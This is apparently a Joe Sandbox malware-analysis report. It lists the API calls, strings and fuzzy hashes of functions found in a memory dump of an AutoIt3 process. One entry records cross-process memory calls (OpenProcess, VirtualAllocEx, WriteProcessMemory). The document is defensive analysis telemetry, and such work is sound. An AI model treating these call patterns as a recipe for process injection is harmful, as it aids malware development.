                                      • Instruction ID: 471790111ef7edbe080dd6b2c0df492873122677da0f17e3c345acbaca9d2c56
                                      • Opcode Fuzzy Hash: 21d9f940c1b5e2eb1af9d8cf7b268bdcdfb857734f7aaefbab473b596e60baac
                                      • Instruction Fuzzy Hash: 17219A30904208EFDF119F29DC4CB697BB8FB00321F144266FA25D61E4D7B19891CF94
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                       • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: _memcmp
                                      • String ID:
                                      • API String ID: 2931989736-0
                                      • Opcode ID: 910223fca03d0bfbb5287a494565219837e302665cfb082e707ea5f3f372b7e4
                                      • Instruction ID: 507dce4e8799a1164b4a7880ab16092de130813b6da07ce56e236e292eefe4dc
                                      • Opcode Fuzzy Hash: 910223fca03d0bfbb5287a494565219837e302665cfb082e707ea5f3f372b7e4
                                      • Instruction Fuzzy Hash: 1901D2A2B003193FDA106115AC86FAB736CFA7039AF184035FE16E6B41E764DF1886E1
                                      APIs
                                      • GetCurrentThreadId.KERNEL32 ref: 00865075
                                      • __beginthreadex.LIBCMT ref: 00865093
                                      • MessageBoxW.USER32(?,?,?,?), ref: 008650A8
                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 008650BE
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 008650C5
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                       • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                      • String ID:
                                      • API String ID: 3824534824-0
                                      • Opcode ID: 367c528e0866ae5233ed90237b63b562bfff11680b1212f7903459a3f74c04cd
                                      • Instruction ID: 7f1672bb4660dafa09e6a2c7537d8ac26df8836fd16df3b2337ac07c33d2acfc
                                      • Opcode Fuzzy Hash: 367c528e0866ae5233ed90237b63b562bfff11680b1212f7903459a3f74c04cd
                                      • Instruction Fuzzy Hash: 2A110472908B18BFC7019BA89C08A9B7BACFB45320F140256F916D3360D6718D448BF1
                                      APIs
                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00858E3C
                                      • GetLastError.KERNEL32(?,00858900,?,?,?), ref: 00858E46
                                      • GetProcessHeap.KERNEL32(00000008,?,?,00858900,?,?,?), ref: 00858E55
                                      • HeapAlloc.KERNEL32(00000000,?,00858900,?,?,?), ref: 00858E5C
                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00858E73
                                      Similarity
                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                      • String ID:
                                      • API String ID: 842720411-0
                                      • Opcode ID: 7e59a838b4cbae2ba57eefafcb382a3074a818241e5427f6bdc2c195e0ac305d
                                      • Instruction ID: 48a6ea56064454f7765454fa64e693bd4346f2b73d5b1bdcfc0f818039249955
                                      • Opcode Fuzzy Hash: 7e59a838b4cbae2ba57eefafcb382a3074a818241e5427f6bdc2c195e0ac305d
                                      • Instruction Fuzzy Hash: 710146B1200204AFDB215FA6DC89D6B7BBDFF8A355B54052AF849D2220DB319C14CE60
                                      APIs
                                      • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0086581B
                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00865829
                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00865831
                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0086583B
                                      • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00865877
                                      Similarity
                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                      • String ID:
                                      • API String ID: 2833360925-0
                                      • Opcode ID: 93bf70ea78a8da3f1dc18a05fb0a46717b27714ac5aef8ff5f56de6f35c6a600
                                      • Instruction ID: 57e75ede6626ed6f238a84734a7e52690de5461f3233173458f8d7bb7379da60
                                      • Opcode Fuzzy Hash: 93bf70ea78a8da3f1dc18a05fb0a46717b27714ac5aef8ff5f56de6f35c6a600
                                      • Instruction Fuzzy Hash: AB011731D01A1D9BDF04AFE9D8499EEBBB8FB08B11F064566E601F3540DB309550CBA5
                                      APIs
                                      • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00857C62,80070057,?,?,?,00858073), ref: 00857D45
                                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00857C62,80070057,?,?), ref: 00857D60
                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00857C62,80070057,?,?), ref: 00857D6E
                                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00857C62,80070057,?), ref: 00857D7E
                                      • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00857C62,80070057,?,?), ref: 00857D8A
                                      Similarity
                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                      • String ID:
                                      • API String ID: 3897988419-0
                                      • Opcode ID: b969089c1765a2f0e480201c44b2185ff5b56193e37cc7d45c9c9d21f2023138
                                      • Instruction ID: aa6b1b9ccac8c5503b628cccfeb88d5f0201668ca6873bfae4b2224f6ed0c91e
                                      • Opcode Fuzzy Hash: b969089c1765a2f0e480201c44b2185ff5b56193e37cc7d45c9c9d21f2023138
                                      • Instruction Fuzzy Hash: E701BC72601218AFDB105F14EC04BAA7BBEFF48392F188029FC08E2214D771ED04CBA0
                                      APIs
                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00858CDE
                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00858CE8
                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00858CF7
                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00858CFE
                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00858D14
                                      Similarity
                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                      • String ID:
                                      • API String ID: 44706859-0
                                      • Opcode ID: 3936ac448a98a9d05e02f86047e02a6ec899350f06159317effc1e7d9e0e0de8
                                      • Instruction ID: 157448c537b6e40d8b434e4b1af537a51755f51b3d8ed6cf901b79f8fecdad3f
                                      • Opcode Fuzzy Hash: 3936ac448a98a9d05e02f86047e02a6ec899350f06159317effc1e7d9e0e0de8
                                      • Instruction Fuzzy Hash: E6F0A931200208AFEF102FA49C89E6B3BACFF89759B14412AF945D31A0CA60AC04DF60
                                      APIs
                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00858D3F
                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00858D49
                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00858D58
                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00858D5F
                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00858D75
                                      Similarity
                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                      • String ID:
                                      • API String ID: 44706859-0
                                      • Opcode ID: 9d862269caaf9526d444f58a66ba1d82d072361b31e8a3a483aab9e19ca2821c
                                      • Instruction ID: 4d3632425c7bdff72e7c003829361f92df38d0a74235b8716029ffdc8ae92bb3
                                      • Opcode Fuzzy Hash: 9d862269caaf9526d444f58a66ba1d82d072361b31e8a3a483aab9e19ca2821c
                                      • Instruction Fuzzy Hash: 3AF0AF31200204AFEB111FA4EC88F6B3BACFF49759F08011AF944D3190CB609D05DF60
                                      APIs
                                      • GetDlgItem.USER32(?,000003E9), ref: 0085CD90
                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 0085CDA7
                                      • MessageBeep.USER32(00000000), ref: 0085CDBF
                                      • KillTimer.USER32(?,0000040A), ref: 0085CDDB
                                      • EndDialog.USER32(?,00000001), ref: 0085CDF5
                                      Similarity
                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                      • String ID:
                                      • API String ID: 3741023627-0
                                      • Opcode ID: 87092dd8d35747f23a4f78e36a90100a80cedcd08c89aed1dc053b1c1e43c765
                                      • Instruction ID: 8b6558316e6e5f05cd47d8d134fcb729625babdd3c09e0ceb5c310989fbb1470
                                      • Opcode Fuzzy Hash: 87092dd8d35747f23a4f78e36a90100a80cedcd08c89aed1dc053b1c1e43c765
                                      • Instruction Fuzzy Hash: EC018631500708AFEB216B64DD4EBA67B78FF10706F04066AF982E10E1DBF1A9588F80
                                      APIs
                                      • EndPath.GDI32(?), ref: 0080179B
                                      • StrokeAndFillPath.GDI32(?,?,0083BBC9,00000000,?), ref: 008017B7
                                      • SelectObject.GDI32(?,00000000), ref: 008017CA
                                      • DeleteObject.GDI32 ref: 008017DD
                                      • StrokePath.GDI32(?), ref: 008017F8
                                      Similarity
                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                      • String ID:
                                      • API String ID: 2625713937-0
                                      • Opcode ID: 7b54bc77035681bdb26f5037dbdc5d65ab01b7b14841b5e01489b69afc5ff13a
                                      • Instruction ID: 40df34a7c8ee481c477b68f5ffc57040e67dc88cee2253e1199241290e6532c0
                                      • Opcode Fuzzy Hash: 7b54bc77035681bdb26f5037dbdc5d65ab01b7b14841b5e01489b69afc5ff13a
                                      • Instruction Fuzzy Hash: 7CF0C431008608EFDB616F26EC4CB693BB4FB00326F188225F939951F4C7318995DF15
                                      APIs
                                        • Part of subcall function 00820FE6: std::exception::exception.LIBCMT ref: 0082101C
                                        • Part of subcall function 00820FE6: __CxxThrowException@8.LIBCMT ref: 00821031
                                        • Part of subcall function 00811A36: _memmove.LIBCMT ref: 00811A77
                                        • Part of subcall function 00811680: _memmove.LIBCMT ref: 008116DB
                                      • __swprintf.LIBCMT ref: 0080E598
                                      Strings
                                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0080E431
                                      Similarity
                                      • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                      • API String ID: 1943609520-557222456
                                      • Opcode ID: 70a61a015bbf3b79fcd3dc9e10aa4ed1fc5ef44bd64adbb56cb0bf843a2686cb
                                      • Instruction ID: 0c0efd8a839c8181173b19d1342e621796bbf16774e4ebc940858aa2471ad8ef
                                      • Opcode Fuzzy Hash: 70a61a015bbf3b79fcd3dc9e10aa4ed1fc5ef44bd64adbb56cb0bf843a2686cb
                                      • Instruction Fuzzy Hash: 33919F711086159FCB14EF28DC95CAFB7A8FF95304F40091DF592D72A2EA20EE84CB92
                                      APIs
                                        • Part of subcall function 00820284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00812A58,?,00008000), ref: 008202A4
                                      • CoInitialize.OLE32(00000000), ref: 0086BFFE
                                      • CoCreateInstance.OLE32(00893D3C,00000000,00000001,00893BAC,?), ref: 0086C017
                                      • CoUninitialize.OLE32 ref: 0086C034
                                        • Part of subcall function 00804D37: __itow.LIBCMT ref: 00804D62
                                        • Part of subcall function 00804D37: __swprintf.LIBCMT ref: 00804DAC
                                      Strings
                                      Similarity
                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                      • String ID: .lnk
                                      • API String ID: 2126378814-24824748
                                      • Opcode ID: 57a39c8329d0cc73d29ba13f07adb1d24684ed674c4d93e3b66f3c027a149eeb
                                      • Instruction ID: 4e14701767edb8e5a71209ae31347d35f3f322f555564a81dfe292e53438373c
                                      • Opcode Fuzzy Hash: 57a39c8329d0cc73d29ba13f07adb1d24684ed674c4d93e3b66f3c027a149eeb
                                      • Instruction Fuzzy Hash: 23A147B52042019FCB00DF58C884D6AB7E5FF89314F058999F899DB3A2CB31ED45CB92
                                      APIs
                                      • __startOneArgErrorHandling.LIBCMT ref: 008252CD
                                        • Part of subcall function 00830320: __87except.LIBCMT ref: 0083035B
                                      Strings
                                      Similarity
                                      • API ID: ErrorHandling__87except__start
                                      • String ID: pow
                                      • API String ID: 2905807303-2276729525
                                      • Opcode ID: e7e04b2272c8ae7f3efd102795eb0fb0c8ae0fbba2783761f9422d050aa71d80
                                      • Instruction ID: 069194bad840e2fe392dc257ffd9defec9efeb2da523baaf9bedf7f2e9508a69
                                      • Opcode Fuzzy Hash: e7e04b2272c8ae7f3efd102795eb0fb0c8ae0fbba2783761f9422d050aa71d80
                                      • Instruction Fuzzy Hash: 32519B60E4D606D7CB15B718E92137A2B94FB81759F344C58E4C1C63E9EE348DC49ECA
                                      Strings
                                      Similarity
                                      • API ID:
                                      • String ID: #$+
                                      • API String ID: 0-2552117581
                                      • Opcode ID: 027e502b7c9c387061d06dcfbfee7de28a8f5924b2a173c8c6f67778ca624cd4
                                      • Instruction ID: cba0ee21ce3c9514420cf7bf00925958efef21b478011a52b07623d04e6fd792
                                      • Opcode Fuzzy Hash: 027e502b7c9c387061d06dcfbfee7de28a8f5924b2a173c8c6f67778ca624cd4
                                      • Instruction Fuzzy Hash: F0513375500259CFDF11DF68D880AFA7BA4FF69321F580065EC81DB291E731ACAACB61
                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: _memset$_memmove
                                      • String ID: ERCP
                                      • API String ID: 2532777613-1384759551
                                      • Opcode ID: c54f027689012ad4f0dc7a3a6d0d06cbc26ebf821e9e6ae60e0de5b1a76c8fc8
                                      • Instruction ID: 4f9e77353fed8ed78f5fbf8a20d433609c3c0eedd777ee704d9c9d11404cc34d
                                      • Opcode Fuzzy Hash: c54f027689012ad4f0dc7a3a6d0d06cbc26ebf821e9e6ae60e0de5b1a76c8fc8
                                      • Instruction Fuzzy Hash: 7E51B3B1A007099BDB24CF64C885BEABBE8FF18314F24856EE94ADB251E770D5C5CB50
                                      APIs
                                        • Part of subcall function 00861CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00859E4E,?,?,00000034,00000800,?,00000034), ref: 00861CE5
                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0085A3F7
                                        • Part of subcall function 00861C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00859E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00861CB0
                                        • Part of subcall function 00861BDD: GetWindowThreadProcessId.USER32(?,?), ref: 00861C08
                                        • Part of subcall function 00861BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00859E12,00000034,?,?,00001004,00000000,00000000), ref: 00861C18
                                        • Part of subcall function 00861BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00859E12,00000034,?,?,00001004,00000000,00000000), ref: 00861C2E
                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0085A464
                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0085A4B1
                                      Strings
                                      Similarity
                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                      • String ID: @
                                      • API String ID: 4150878124-2766056989
                                      • Opcode ID: 725022d8595af6dc10f2edead7ad2a47580078bc6fc185b3de10f4bf2105cdb5
                                      • Instruction ID: 70bb2d2283485eb3df5fb939e97d6840c87fe53145e87a4f30ad686c0390c809
                                      • Opcode Fuzzy Hash: 725022d8595af6dc10f2edead7ad2a47580078bc6fc185b3de10f4bf2105cdb5
                                      • Instruction Fuzzy Hash: 92413D7290021CAFDF14DBA8CD85AEEBBB8FF45300F044195FA55B7181DA706E89CB62
                                      APIs
                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00890980,00000000,?,?,?,?), ref: 00888004
                                      • GetWindowLongW.USER32 ref: 00888021
                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00888031
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Window$Long
                                      • String ID: SysTreeView32
                                      • API String ID: 847901565-1698111956
                                      • Opcode ID: fcb2dbe269d90912a950bb361dae83bd775f5566486f97eada80ec56d6e1f300
                                      • Instruction ID: 5ec5c57b170aca89cd669d9fd42969032d8d6e9d6fa140cfcbea2519ba76a85a
                                      • Opcode Fuzzy Hash: fcb2dbe269d90912a950bb361dae83bd775f5566486f97eada80ec56d6e1f300
                                      • Instruction Fuzzy Hash: E6319C31204609AEDB21AE38CC45BEA77A9FF49324F244325F975D32E0CB71E8549B60
                                      APIs
                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00887A86
                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00887A9A
                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00887ABE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window
                                      • String ID: SysMonthCal32
                                      • API String ID: 2326795674-1439706946
                                      • Opcode ID: a363bb5b4cbd6489e10f829296206a429948bb8599f35a1734912c3344ca2bcb
                                      • Instruction ID: e28a3c385203f0461a7af067156bb10c16b99a4fead320855c1aa8fae7b6cf20
                                      • Opcode Fuzzy Hash: a363bb5b4cbd6489e10f829296206a429948bb8599f35a1734912c3344ca2bcb
                                      • Instruction Fuzzy Hash: EE218D32610229AFDF159F54CC86FEE3B79FB48724F250214FE15AB1D0DAB1E8509BA0
                                      APIs
                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0088826F
                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0088827D
                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00888284
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessageSend$DestroyWindow
                                      • String ID: msctls_updown32
                                      • API String ID: 4014797782-2298589950
                                      • Opcode ID: 82b56dcd270ff6becff81e57f9739d1ef26fbbe6d8b16c2f74bf4aa00af4d202
                                      • Instruction ID: 8a963637191f04c826a088e7d9a6ab3ae0653342b1af41cb05019994a0693c39
                                      • Opcode Fuzzy Hash: 82b56dcd270ff6becff81e57f9739d1ef26fbbe6d8b16c2f74bf4aa00af4d202
                                      • Instruction Fuzzy Hash: 20217AB5604209AFDB10EF58DC85DA737ADFB5A3A4B480059FA11DB2A1CB70EC11CBA0
                                      APIs
                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00887360
                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00887370
                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00887395
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessageSend$MoveWindow
                                      • String ID: Listbox
                                      • API String ID: 3315199576-2633736733
                                      • Opcode ID: 91350ec390c2997749c087be2e90d5edb492281144e8ab15eddbafb90197296f
                                      • Instruction ID: 3852bf923d444270106bf3d1056b670773732fab52c65e6d3e2ae78afd5b00ad
                                      • Opcode Fuzzy Hash: 91350ec390c2997749c087be2e90d5edb492281144e8ab15eddbafb90197296f
                                      • Instruction Fuzzy Hash: 1121AF32604118BFDB129F54CC85EAF37BAFB89764F618124FA04DB290C671EC51ABA0
                                      APIs
                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00887D97
                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00887DAC
                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00887DB9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: msctls_trackbar32
                                      • API String ID: 3850602802-1010561917
                                      • Opcode ID: fdbdbe26cc172652cb82f83e6040ff7bf4fc1555564df0dd7857798db534b05d
                                      • Instruction ID: 3452087f9fd5ae1a37b5afcddda15cb5937be9e2b3fed23f6560c18fba94cc6b
                                      • Opcode Fuzzy Hash: fdbdbe26cc172652cb82f83e6040ff7bf4fc1555564df0dd7857798db534b05d
                                      • Instruction Fuzzy Hash: 0811E372244208BEDF20AF64CC05FEB3BA9FF89B54F214518FB45E61A0D671E811DB20
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00814AF7,?), ref: 00814BB8
                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00814BCA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                      • API String ID: 2574300362-1355242751
                                      • Opcode ID: 5fd4489c16c51f00d19aee89bb22f8116da582acd6ccd4c84cbd8e3cc127843a
                                      • Instruction ID: 3b35408c49ae0248f596e78fba705d6ab9dfe778c10186d0d29f75aea7791a91
                                      • Opcode Fuzzy Hash: 5fd4489c16c51f00d19aee89bb22f8116da582acd6ccd4c84cbd8e3cc127843a
                                      • Instruction Fuzzy Hash: FCD017705197128FD720AFB1EC08B8676E9FF04365B19AC6AD4A6D6664EA74D8C0CA10
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00814B44,?,008149D4,?,?,008127AF,?,00000001), ref: 00814B85
                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00814B97
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                      • API String ID: 2574300362-3689287502
                                      • Opcode ID: 08b55628fd428c084041d83574bffb194b4077c63c1f74685fc95484b110d0c3
                                      • Instruction ID: f81f31f00c49f4d8bddfb5fd52b7ecb3e73b9ad53c4369cae57978bb32a6dc1a
                                      • Opcode Fuzzy Hash: 08b55628fd428c084041d83574bffb194b4077c63c1f74685fc95484b110d0c3
                                      • Instruction Fuzzy Hash: F4D012705147128FD7206FB1DC1874676D8FF04351F15982AD4A5D2650D6B4D4C0CA14
                                      APIs
                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,00881696), ref: 00881455
                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00881467
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
